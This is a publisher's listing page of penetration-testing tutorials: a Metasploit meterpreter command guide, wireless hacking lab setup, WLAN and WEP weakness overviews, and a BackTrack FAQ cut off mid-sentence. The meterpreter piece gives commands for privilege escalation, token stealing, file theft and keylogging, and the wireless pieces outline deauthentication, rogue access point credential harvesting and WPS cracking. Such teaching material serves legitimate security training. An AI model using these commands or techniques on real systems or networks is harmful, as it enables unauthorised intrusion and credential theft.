Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Penetration Testing

54 Articles
article-image-so-what-metasploit
Packt
06 Aug 2013
9 min read
Save for later

So, what is Metasploit?

Packt
06 Aug 2013
9 min read
(For more resources related to this topic, see here.) In the IT industry, we have various flavors of operating systems ranging from Mac, Windows, *nix platforms, and other server operating systems, which run an n number of services depending on the needs of the organization. When given a task to assess the risk factor of any organization, it becomes very tedious to run single code snippets against these systems. What if, due to some hardware failure, all these code snippets are lost? Enter Metasploit. Metasploit is an exploit development framework started by H. D. Moore in 2003, which was later acquired by Rapid7. It is basically a tool for the development of exploits and the testing of these exploits on live targets. This framework has been completely written using Ruby,and is currently one of the largest frameworks ever written in the Ruby language. The tool houses more than 800 exploits in its repository and hundreds of payloads for each exploit. This also contains various encoders, which help us in the obfuscation of exploits to evade the antivirus and other intrusion detection systems ( IDS ). As we progress in this book, we shall uncover more and more features of this tool. This tool can be used for penetration testing, risk assessment, vulnerability research, and other security developmental practices such as IDS and the intrusion prevention system ( IPS ). Top features you need to know about After learning about the basics of the Metasploit framework, in this article we will find out the top features of Metasploit and learn some of the attack scenarios. This article will be a flow of the following features: The meterpreter module Using auxiliary modules in Metasploit Client-side attacks with auxiliary modules The meterpreter module In the earlier article, we have seen how to open up a meterpreter session in Metasploit. But in this article, we shall see the features of the meterpreter module and its command set in detail. Before we see the working example, let's see why meterpreter is used in exploitation: It doesn't create a new process in the target system It runs in the context of the process that is being exploited It performs multiple tasks in one go; that is, you don't have to create separate requests for each individual task It supports scripts writing Let's check out what the meterpreter shell looks like. Meterpreter allows you to provide commands and obtain results. Let's see the list of commands that are available to use under meterpreter. These can be obtained by typing help in the meterpreter command shell. The syntax for this command is as follows: meterpreter>help The following screenshot represents the core commands: The filesystem commands are as follows: The networking commands are as follows: The system commands are as follows: The user interface commands are as follows: The other miscellaneous commands are as follows: As you can see in the preceding screenshots, meterpreter has two sets of commands set apart from its core set of commands. They are as follows: Stdapi Priv The Stdapi command set contains various commands for the filesystem commands, networking commands, system commands, and user-interface commands. Depending on the exploit, if it can get higher privileges, the priv command set is loaded. By default, the stdapi command set and core command set gets loaded irrespective of the privilege an exploit gets. Let's check out the route command from the meterpreter stdapi command set. The syntax is as follows: meterpreter>route [–h] command [args] In the following screenshot, we can see the list of all the routes on the target machine: In a scenario where we wish to add other subnets and gateways we can use the concept of pivoting, where we add a couple of routes for optimizing the attack. The following are the commands supported by the route: Add [subnet] [netmask] [gateway]Delete [subnet] [netmask] [gateway] List Another command that helps during pivoting is port-forwarding. Meterpreter supports port forwarding via the following command. The syntax for this command is as follows: meterpreter>portfwd [-h] [add/delete/list] [args] As soon as an attacker breaks into any system, the first thing that he/she does is check what privilege levels he/she has to access the system. Meterpreter provides a command for working out the privilege level after breaking into the system. The syntax for this command is as follows: meterpreter>getuid The following screenshot demonstrates the working of getuid in meterpreter. In the following screenshot, the attacker is accessing the system with the SYSTEM privilege. In a Windows environment, the SYSTEM privilege is the highest possible privilege available. Suppose we failed to get access to the system as a SYSTEM user, but succeeded in getting access via the administrator, then meterpreter provides you with many ways to elevate your access levels. This is called privilege escalation. The commands are as follows: Syntax: meterpreter>getsystem Syntax: meterpreter>migrate process_id Syntax: meterpreter>steal_token process_id The first method uses an internal procedure within the meterpreter to gain the system access, whereas in the second method, we are migrating to a process that is running with a SYSTEM privilege. In this case, the exploit by default gets loaded in any process space of the Windows operating system. But, there is always a possibility that the user clears that process space by deleting that process from the process manager. In a case like this, it's wise to migrate to a process which is usually untouched by the user. This helps in maintaining a prolonged access to the victim machine. In the third method, we are actually impersonating a process which is running as a SYSTEM privileged process. This is called impersonation via token stealing. Basically, Windows assigns users with a unique ID called Secure Identifier (SID). Each thread holds a token containing information about the privilege levels. Impersonating a token happens when one particular thread temporarily assumes the identity of another process in the same system. We have seen the usage of process IDs in the preceding commands, but how do we fetch the process ID? That is exactly what we I shall be covering in this article. Windows runs various processes and the exploit itself will be running in the process space of the Windows system. To list all these processes with their PIDs and the privilege levels, we use the following meterpreter command: meterpreter>ps The following screenshot gives a clear picture of the ps command: In the preceding screenshot, we have the PIDs listed. We can use these PIDs to escalate our privileges. Once you steal a token, it can be dropped using the Drop_token command. The syntax for this command is as follows: meterpreter>drop_token Another interesting command from the stdapi set is the shell command. This spawns a shell in the target system and enables us to navigate through the system effortlessly. The syntax for this command is as follows: meterpreter>shell The following screenshot shows the usage of the shell command: The preceding screenshot shows that we are inside the target system. All the usual windows command shell scripts such as dir, cd, and md work here. After briefly covering system commands, let's start learning the filesystem commands. A filesystem contains a working directory. To find out the current working directory in the target system, we use the following command: meterpreter>pwd The following screenshot shows the command in action: Suppose you wish to search for different files on the target system, then we can use a command called search. The syntax for this command is as follows: meterpreter> search [-d dir][-r recurse] –f pattern Various options available under the search command are: -d: This is the directory to begin the search. If nothing is specified, then it searches all drives. -f: The pattern that we would like to search for. For example, *.pdf. -h: Provides the help context. -r: Used when we need to recursively search the subdirectories. By default this is set to true. Once we get the file we need, we use the download command to download it to our drive. The syntax for this command is as follows: meterpreter>download Full_relative_path By now we have covered the core commands, system commands, networking commands, and filesystem commands. The last article of the stdapi command set is the user-interface commands. The most commonly used commands are the keylogging commands. These commands are very effective in sniffing user account credentials: Syntax: meterpreter>keyscan_start Syntax: meterpreter>keyscan_dump Syntax: meterpreter>keyscan_stop This is the procedure of the usage of this command. The following screenshot explains the commands in action: The communication between the meterpreter and its targets is done via type-length-value. This means that the data is getting transferred in an encrypted manner. This leads to multiple channels of communications. The advantage of this is that multiple programs can communicate with an attacker. The creation of channels is illustrated in the following screenshot: The syntax for this command is as follows: meterpreter>execute process_name –c -c is the parameter that tells the meterpreter to channel the input/output. When the attack requires us to interact with multiple processes then the concept of channels comes in handy as a tool for the attacker. The close command is used to exit a channel. Summary In this article we learned what is Metaspoilt and also saw one of its top feature. Resources for Article: Further resources on this subject: Understanding the True Security Posture of the Network Environment being Tested [Article] Preventing Remote File Includes Attack on your Joomla Websites [Article] Tips and Tricks on BackTrack 4 [Article]
Read more
  • 0
  • 0
  • 10729

article-image-wireless-and-mobile-hacks
Packt
22 Jul 2014
6 min read
Save for later

Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.) So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win. Wireless environment setup This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing: Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous. Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the Mac address as they very rarely collide. (Mac randomizing tools be damned.) If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you. Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt. Software We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools: Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them. Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks. Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at. Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about. dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSchef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS. Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive. Hardware You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter in promiscuous mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers. However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant. The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
Read more
  • 0
  • 0
  • 10385

article-image-common-wlan-protection-mechanisms-and-their-flaws
Packt
07 Mar 2016
19 min read
Save for later

Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws do they have. This topic will be useful not only for those readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists. (For more resources related to this topic, see here.) Hiding SSID Let's start with one of the common mistakes done by network administrators: relying only on the security by obscurity. In the frames of the current subject, it means using a hidden WLAN SSID (short for service set identification) or simply WLAN name. Hidden SSID means that a WLAN does not send its SSID in broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list. But the lack of WLAN advertising does not mean that a SSID is never transmitted in the air—it is actually transmitted in plaintext with a lot of packet between access points and devices connected to them regardless of a security type used. Therefore, SSIDs are always available for all the Wi-Fi network interfaces in a range and visible for any attacker using various passive sniffing tools. MAC filtering To be honest, MAC filtering cannot be even considered as a security or protection mechanism for a wireless network, but it is still called so in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed (refer to the following screenshot): An example of wireless traffic sniffing tool easily revealing MAC addresses Keeping in mind the extreme simplicity of changing a physical address (MAC address) of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as an only security measure for a WLAN. WEP Wired equivalent privacy (WEP) was born almost 20 years ago at the same time as the Wi-Fi technology and was integrated as a security mechanism for the IEEE 802.11 standard. Like it often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allowed them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between WLAN and client devices. Let's briefly review how WEP encryption works and why is it so easy to break. WEP uses so-called initialization vectors (IV) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, an IV is added to a packet as it is and sent to a receiving side, for example, an access point. This process is depicted in the following flowchart: The WEP encryption process An attacker just needs to collect enough IVs, which is also a trivial task using additional reply attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have a cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways how an attacker can abuse a WEP-protected WLAN, for example: Decrypt network traffic using passive sniffing and statistical cryptanalysis Decrypt network traffic using active attacks (reply attack, for example) Traffic injection attacks Unauthorized WLAN access Although WEP was officially superseded by the WPA technology in 2003, it still can be sometimes found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used anymore in future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices to avoid its usage and increase their customers' security. From the security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes. Regardless of a security type in use, shared keys always add the additional security risk; users often tend to share keys, thus increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater amount of traffic becomes suitable for an attacker during cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (key, certificate) for users and devices. WPA/WPA2 Due to numerous WEP security flaws, the next generation of Wi-Fi security mechanism became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 is available and contained significant security improvements over WEP. Those improvements include: Stronger encryption Cryptographic integrity control: WPA uses an algorithm called Michael instead of CRC used in WEP. This is supposed to prevent altering data packets on the fly and protects from resending sniffed packets. Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically changes encryption keys generated for every packet. This is the major improvement over the static WEP where encryption keys should be entered manually in an AP config. TKIP also operates RC4, but the way how it is used was improved. Support of client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks. The support of cryptographically strong algorithm Advanced Encryption Standard (AES) was implemented in WPA, but it was not set as mandatory, only optional. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices. WPA2 works very similar to WPA and the main differences between WPA and WPA2 is in the algorithms used to provide security: AES became the mandatory algorithm for encryption in WPA2 instead of default RC4 in WPA TKIP used in WPA was replaced by Counter Cipher Mode with Block Chaining Message Authentication Code Protocol (CCMP) Because of the very similar workflows, WPA and WPA2 are also vulnerable to the similar or the same attacks and usually called and spelled in one word WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode and enterprise mode. Pre-shared key mode Pre-shared key or personal mode was intended for home and small office use where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to home networks. The general idea of PSK mode is using the same secret key on an access point and on a client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake. It is depicted in the following diagram: WPA/WPA2 4-way handshake The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way handshake and brute-force a security key offline without any interaction with a target WLAN. Generally, the security of a WLAN mostly depends on the complexity of a chosen PSK. Computing a PMK (short for primary master key) used in 4-way handshakes (refer to the handshake diagram) is a very time-consuming process compared to other computing operations and computing hundreds of thousands of them can take very long. But in case of a short and low complexity PSK in use, a brute-force attack does not take long even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but still there are ways to speed up this process: Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows a software to directly communicate with GPUs for computing. As GPUs are natively designed to perform mathematical operations and do it much faster than CPUs, the process of cracking works several times faster with CUDA. Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker because the cracking software just searches for a value from an intercepted 4-way handshake in rainbow tables and returns a key corresponding to the given PMK if there was a match instead of computing PMKs for every possible character combination. Because WLAN SSIDs are used in 4-way handshakes analogous to a cryptographic salt, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs. Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power can an attacker rent (or get through another ways), the faster goes the process. There are also online cloud-cracking services available in Internet for various cracking purposes including cracking 4-way handshakes. Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the risk of compromise—that's why it is also not an option for big complex corporate networks. WPA/WPA2 PSK mode provides the sufficient level of security for home and small office networks only when a key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID. Enterprise mode As it was already mentioned in the previous section, using shared keys itself poses a security risk and in case of WPA/WPA2 highly relies on a key length and complexity. But there are several factors in enterprise networks that should be taken into account when talking about WLAN infrastructure: flexibility, manageability, and accountability. There are various components that implement those functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers. WPA-Enterprise or 802.1x mode was designed for enterprise networks where a high security level is needed and the use of AAA server is required. In most cases, a RADIUS server is used as an AAA server and the following EAP (Extensible Authentication Protocol) types are supported (and several more, depending on a wireless device) with WPA/WPA2 to perform authentication: EAP-TLS EAP-TTLS/MSCHAPv2 PEAPv0/EAP-MSCHAPv2 PEAPv1/EAP-GTC PEAP-TLS EAP-FAST You can find a simplified WPA-Enterprise authentication workflow in the following diagram: WPA-Enterprise authentication Depending on an EAP-type configured, WPA-Enterprise can provide various authentication options. The most popular EAP-type (based on our own experience in numerous pentests) is PEAPv0/MSCHAPv2, which is relatively easily integrated with existing Microsoft Active Directory infrastructures and is relatively easy to manage. But this type of WPA-protection is relatively easy to defeat by stealing and bruteforcing user credentials with a rogue access point. The most secure EAP-type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check server's identity and a successful attack with a rogue access point becomes possible only if there are errors in configuration or insecurities in certificates maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication. But this type of security requires additional work and resources. WPS Wi-Fi Protected Setup (WPS) is actually not a security mechanism, but a key exchange mechanism which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, but it turned out to be one of the biggest wholes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs with one of the following methods: PIN: Entering a PIN on a device. A PIN is usually printed on a sticker at the back side of a Wi-Fi access point. Push button: Special buttons should be pushed on both an access point and a client device during the connection phase. Buttons on devices can be physical and virtual. NFC: A client should bring a device close to an access point to utilize the Near Field Communication technology. USB drive: Necessary connection information exchange between an access point and a device is done using a USB drive. Because WPS PINs are very short and their first and second parts are validated separately, online brute-force attack on a PIN can be done in several hours allowing an attacker to connect to a WLAN. Furthermore, the possibility of offline PIN cracking was found in 2014 which allows attackers to crack pins in 1 to 30 seconds, but it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access a Wi-Fi router or access point can also read and use a PIN or connect via push button method. Getting familiar with the Wi-Fi attack workflow In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without the understanding of various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs. General Wi-Fi attack methodology After refreshing our knowledge about wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attack, wireless attack workflows depend on certain situations and targets, but they still align with the following general sequence in almost all cases: The first step is planning. Normally, attackers need to plan what are they going to attack, how can they do it, which tools are necessary for the task, when is the best time and place to attack certain targets, and which configuration templates will be useful so that they can be prepared in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on a customer side, define project deliverables, and do some other organizational work if demanded. As with every penetration testing project, the better a project was planned (and we can use the word "project" for black-hat hackers' tasks), the more chances of a successful result. The next step is survey. Getting as accurate as possible and as much as possible information about a target is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least SSIDs or MAC addresses of access points and clients and information about a security type in use. It is also very helpful for an attacker to understand if WPS is enabled on a target access point. All that data allows attackers not only to set proper configs and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical (for example, company and department names, brands, or employee names), can also become useful at the cracking phase to build dictionaries for brute-force attacks. Depending on a type of security and attacker's luck, a data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly with the cracking phase. The active attacks phase involves active interaction between an attacker and targets (WLANs and Wi-Fi clients). At this phase, attackers have to create conditions necessary for a chosen attack type and execute it. It includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker wants to cause a denial of service in a target WLAN as a goal, such attacks are also executed at this phase. Some of active attacks are essential to successfully hack a WLAN, but some of them are intended to just speed up hacking and can be omitted to avoid causing alarm on various wireless intrusion detection/prevention systems (wIDPS), which can possibly be installed in a target network. Thus, the active attacks phase can be called optional. Cracking is another important phase where an attacker cracks 4-way-hadshakes, WEP data, NTLM hashes, and so on, which were intercepted at the previous phases. There are plenty of various free and commercial tools and services including cloud cracking services. In case of success at this phase, an attacker gets the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypt intercepted traffic, and so on. The active attacking phase Let's have a closer look to the most interesting parts of the active attack phase—WPA-PSK and WPA-Enterprise attacks—in the following topics. WPA-PSK attacks As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ—an attacker needs to sniff a 4-way handshake in the moment, establishing a connection between an access point and an arbitrary wireless client and bruteforcing a matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN. Sometimes, attackers have to wait long until a device connects to a WLAN to intercept a 4-way handshake and of course they would like to speed up the process when possible. For that purpose, they force already connected device to disconnect from an access point sending control frames (deauthentication attack) on behalf of a target access point. When a device receives such a frame, it disconnects from a WLAN and tries to reconnect again if the "automatic reconnect" feature is enabled (it is enabled by default on most devices), thus performing another one 4-way handshake that can be intercepted by an attacker. Another possibility to hack a WPA-PSK protected network is to crack a WPS PIN if WPS is enabled on a target WLAN. Enterprise WLAN attacks Attacking becomes a little bit more complicated if WPA-Enterprise security is in place, but could be executed in several minutes by a properly prepared attacker by imitating a legitimate access point with a RADIUS server and by gathering user credentials for further analysis (cracking). To settle this attack, an attacker needs to install a rogue access point with a SSID identical to a target WLAN's SSID and set other parameter (like EAP type) similar to the target WLAN to increase chances on success and reduce the probability of the attack to be quickly detected. Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by a signal strength—they connect to that one which has the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for a rogue access point to override signals from legitimate ones and make devices around connect to the rogue access point. A RADIUS server used during such attacks should have a capability to record authentication data, NTLM hashes, for example. From a user perspective, being attacked in such way looks just being unable to connect to a WLAN for an unknown reason and could even be not seen if a user is not using a device at the moment and just passing by a rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases. An attacker or a penetration tester can install a rogue access point outside of the range of a target WLAN. It will allow hacker to attack user devices without the need to get into a physically controlled area (for example, office building), thus making the rogue access point unreachable and invisible for wireless IDPS systems. Such a place could be a bus or train station, parking or a café where a lot of users of a target WLAN go with their Wi-Fi devices. Unlike WPA-PSK with only one key shared between all WLAN users, the Enterprise mode employs personified credentials for each user whose credentials could be more or less complex depending only on a certain user. That is why it is better to collect as many user credentials and hashes as possible thus increasing the chances of successful cracking. Summary In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threads, and common misconfigurations that lead to security breaches and allow attacker to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with a mutual client and server authentication, which we are going to implement in our penetration testing lab. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Advanced Wireless Sniffing [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 9789

article-image-introduction-wep
Packt
10 Aug 2015
4 min read
Save for later

An Introduction to WEP

Packt
10 Aug 2015
4 min read
In this article by Marco Alamanni, author of the book, Kali Linux Wireless Penetration Testing Essentials, has explained that the WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the RC4 (Rivest Cipher 4) stream cypher with a preshared secret key (PSK) of 40 or 104 bits, depending on the implementation. A 24 bit pseudo-random Initialization Vector (IV) is concatenated with the preshared key to generate the per-packet keystream used by RC4 for the actual encryption and decryption processes. Thus, the resulting keystream could be 64 or 128 bits long. (For more resources related to this topic, see here.) In the encryption phase, the keystream is XORed with the plaintext data to obtain the encrypted data, while in the decryption phase the encrypted data is XORed with the keystream to obtain the plaintext data. The encryption process is shown in the following diagram: Attacks against WEP First of all, we must say that WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, to the use of IVs and to the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose has not been accomplished in the design of WEP, because the IV is only 24 bits long (with 2^24 = 16,777,216 possible values) and it is transmitted in clear-text within each frame. Thus, after a certain period of time (depending on the network traffic) the same IV, and consequently the same keystream, will be reused, allowing the attacker to collect the relative cypher texts and perform statistical attacks to recover the plain texts and the key. The first well-known attack against WEP was the Fluhrer, Mantin and Shamir (FMS) attack, back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IVs to generate weak keystreams, making possible for an attacker to collect a sufficient number of packets encrypted with these keystreams, analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack has been enhanced by Korek, improving its performances. Andreas Klein found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, that can used to crack the WEP key. In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs like the FMS attack does and is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50 percent using less than 40,000 frames and with a probability of 95 percent with 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys. Both the FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel of the target AP and capturing frames. The problem is that, in normal conditions, we will have to spend quite a long time to passively collect all the necessary packets for the attacks, especially with the FMS attack. To accelerate the process, the idea is to re-inject frames in the network to generate traffic in response so that we could collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request, because the AP broadcasts it and each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack. Summary In this article, we covered the WEP protocol, the attacks that have been developed to crack the keys. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [article] What is Kali Linux [article] Penetration Testing [article]
Read more
  • 0
  • 0
  • 9674

article-image-faqs-backtrack-4
Packt
26 May 2011
8 min read
Save for later

FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Q: Which version of Backtrack is to be chosen? A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or using third-party mirrors like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4 (recently BackTrack 5 is out and hence you may not find version 4 on the official site but the mirror sites like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/ still provide it). One is formatted in ISO image file. You can use this file format if you want to burn it to a DVD, USB, Memory Cards (SSD, SDHC, SDXC, etc) or want to install BackTrack directly to your machine. The second file format is VMWare image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.   Q: What is Portable BackTrack? A: You can also install BackTrack to a USB flash disk, we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot up into BackTrack from any machine provided with USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. When compared to the hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com) and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for Windows, Linux/UNIX, and Mac operating system.   Q: How to install BackTrack in a dual-boot environment? A: One of the resources that describe how to install BackTrack with other operating systems such as Windows XP can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.   Q: What types of penetration testing tools are available under Backtrack 4? A: BackTrack 4 comes with number of security tools that can be used during the penetration testing process. These are categorized into the following: Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from the publicly available resources such as Internet, without touching the target environment. Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system and, probe and map the applications/services through various port scanning techniques. Vulnerability identification: In this category you will find different set of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzzy testing and analyzing SMB and SNMP protocols. Web application analysis: This category contains tools that can be 